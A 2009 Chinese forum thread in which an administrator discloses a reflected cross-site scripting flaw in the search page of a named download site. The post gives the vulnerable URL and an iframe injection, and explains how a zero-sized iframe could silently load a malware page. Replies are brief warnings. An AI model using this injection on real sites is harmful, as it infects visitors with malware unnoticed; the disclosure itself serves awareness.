社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
发帖 回复
« 返回列表
  • 2485阅读
  • 8回复

[原创]绿色下载站 Greendown.cn 存在跨站漏洞!

 楼层直达
霸王硬上弓
级别: 管理员
发帖
28221
飞翔币
1597
威望
888
飞扬币
132188
信誉值
0
只看楼主 更多操作 0 发表于: 2009-07-08
看了一下电脑报的教程 找了下网站 发现绿色软件联盟比较拿找连接。就拿绿色下载站 greendown . cn来做实验。

在搜索框中随便输入某字符 比如 SOFT

会得到如下地址

http://search.greendown.cn/search.asp?action=s&sType=ResName&catalog=&keyword=soft

很明显 最后的四个字幕就是我们输入的数字。由于对内容的控制不严密 使其搜索上面存在跨站漏洞 只需要将四个字幕替换成
<iframe src="http://www.baidu.com" width=50 height=50></iframe> 就可以了。

http://www.baidu.com可以修改成事先设置好的挂马网页,替换上去就行了。当然 最好把width和height改成0 这样浏览页面的时候谁都不回知道里面又内嵌了一个挂马网页 神不知鬼不觉你的电脑就中毒了。这种错误很低级。这也是常常为什么 我只浏览我常去的网站却中毒了的原因所在。当然 我们的飞扬精品软件园不存在此漏洞。



你可以访问一下网址:(放心的 不会挂马 中毒你找我!!!)

http://search.greendown.cn/search.asp?action=s&sType=ResName&catalog=&keyword=<iframe src="http://www.ich8.com" width=800 height=600></iframe>

相关话题

 
分享到 淘江湖 新浪 QQ微博 QQ空间 开心 人人 豆瓣 网易微博 百度 鲜果 白社会 飞信
回复 引用
举报
水上云间
级别: 管理员
发帖
65410
飞翔币
4778
威望
14277
飞扬币
2819
信誉值
145
只看该作者 1 发表于: 2009-07-08
这下大家要小心了啊
飞扬会员交流超级群 40628866
欢迎喜欢飞扬的朋友们加入
祝福笨笨早日恢复健康!
回复 引用
举报
l632896
级别: FLY元勋
发帖
2610
飞翔币
137
威望
1611
飞扬币
1404
信誉值
9
只看该作者 2 发表于: 2009-07-08
回 楼主(霸王硬上弓) 的帖子
哈哈 估计你跑的比鸟还快  
75790363网虫聊天室 加群论坛ID需多于50个
回复 引用
举报
霸王硬上弓
级别: 管理员
发帖
28221
飞翔币
1597
威望
888
飞扬币
132188
信誉值
0
只看该作者 3 发表于: 2009-07-08
大家在访问的时候注意地址后缀名 。
回复 引用
举报
三人行华
级别: FLY元勋
发帖
159
飞翔币
867
威望
108
飞扬币
882
信誉值
0
只看该作者 4 发表于: 2009-07-08
去看看 什么东东
◆我的博客欢迎大家访问◆
回复 引用
举报
岚景峰域
级别: 光盘新手
发帖
211
飞翔币
486
威望
15
飞扬币
1442
信誉值
0
只看该作者 5 发表于: 2009-07-08
不说不知道,一说还真是知道了……
不飞则已,一飞冲天;不鸣则已,一鸣惊人。
回复 引用
举报
wzj
级别: 光盘高级
发帖
690
飞翔币
638
威望
1683
飞扬币
3464
信誉值
0
只看该作者 6 发表于: 2009-07-09
这漏洞比较可怕
回复 引用
举报
三两木
级别: 光盘学士
发帖
3285
飞翔币
830
威望
2719
飞扬币
12240
信誉值
0
只看该作者 7 发表于: 2009-07-13
虽然不能用来害人,但是起码要知道别人是怎么害你的,这就叫知己知彼
强奸易挡,意淫难防
回复 引用
举报
81950273
级别: FLY元勋
发帖
28157
飞翔币
148
威望
18608
飞扬币
6106
信誉值
28
只看该作者 8 发表于: 2009-07-14
大家注意点就是了
总有一天,我会让钞票上印着老子的微笑....
回复 引用
举报
发帖 回复
« 返回列表